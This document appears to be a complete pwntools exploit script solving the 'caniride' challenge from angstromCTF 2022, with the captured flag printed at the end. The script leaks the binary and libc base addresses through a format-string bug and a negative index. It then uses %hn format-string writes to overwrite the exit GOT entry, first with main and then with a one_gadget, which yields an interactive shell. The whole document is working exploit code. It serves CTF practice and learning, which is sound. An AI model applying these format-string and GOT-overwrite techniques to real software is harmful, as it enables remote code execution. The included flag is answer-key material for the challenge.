solver for caniride in angstromCTF 2022

angstrom_caniride.py

from pwn import *

elf = ELF("./caniride")
context.binary = elf

REMOTE = True

if REMOTE:
    io = remote("challs.actf.co", 31228)
    libc = ELF("./libc.so.6")
    offset_one_gadget = 0xe3b31  # rdx = r15 = 0
else:
    # io = process("./caniride_mod")
    io = remote("localhost", 1337)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    offset_one_gadget = 0xe6c81  # rdx = r15 = 0


def make_payload(address, target_address, offset):
    payload = b""
    n = offset
    for i in range(3):
        t = ((address % 0x10000) - n) % 256 ** 2
        if t == 0:
            t += 256 ** 2
        payload += p64(t)
        payload += p64(target_address + 2 * i)
        address //= 256 ** 2
        n += t
    return payload


io.sendlineafter(b"Name: ", "%143$016lx%*16$c%17$hn%*18$c%19$hn%*20$c%21$hn".encode())
io.sendlineafter(b"driver: ", str(-3).encode())
_ = io.recvuntil(b"this is ")
ret = io.recvuntil(b"your")[:-5]
addr_base = u64(ret.ljust(8, b"\x00")) - elf.symbols["__dso_handle"]
print(f"{addr_base = :#x}")

payload = make_payload(addr_base + elf.symbols["main"], addr_base + elf.got["exit"], offset=16)

io.sendafter(b"yourself: ", payload)
_ = io.recvuntil(b"Well we're here. Bye, ")
addr_libc_main_ret = int(io.recv(16), 16)
addr_libc_main = addr_libc_main_ret - 243
libc.address = addr_libc_main - libc.symbols["__libc_start_main"]
print(f"{libc.address = :#x}")

io.sendlineafter(b"Name: ", "%143$016lx%*16$c%17$hn%*18$c%19$hn%*20$c%21$hn".encode())
io.sendlineafter(b"driver: ", str(-3).encode())
payload = make_payload(libc.address + offset_one_gadget, addr_base + elf.got["exit"], offset=16)
io.sendafter(b"yourself: ", payload)
io.interactive()
# actf{h0llerin'_at_y0u_from_a_1977_mont3_car1o_a6ececa9966d}